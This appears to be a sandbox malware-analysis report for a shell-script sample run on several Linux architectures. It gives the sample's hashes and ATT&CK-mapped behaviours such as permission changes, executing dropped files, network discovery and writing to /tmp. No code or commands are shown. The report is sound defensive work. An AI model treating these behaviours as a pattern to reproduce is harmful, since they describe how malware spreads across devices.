Analysis
max time kernel: 150s
max time network: 155s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 28/10/2024, 02:20
Static task: static1
Behavioral task: behavioral1
Sample: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
Sample: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
Sample: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
Sample: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource: debian9-mipsel-20240611-en
General
Target: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Size: 10KB
MD5: a5dec9cd68c75301d742f7bf9789c4f8
SHA1: 24ee3d00677e483eae3654f0eab7a2a06e912288
SHA256: 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
SHA512: 0d552f2f17ef3eb821b94288c9fd717568161003de257fd488b93a41c02257759480e52b93d5d19fee1311a87d6b6136233520c17351af772d5b2ccc6311f9b4
SSDEEP: 192:nXbslV5d8Mv+SUMyCP8okpm79NzTaBVpc8Mv+S2XbslV1yCP8okzvzTaBV2:nXbslV5d8Mv+SUMyCP8oom79Mc8Mv+SW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 21 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (Process: curl)
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads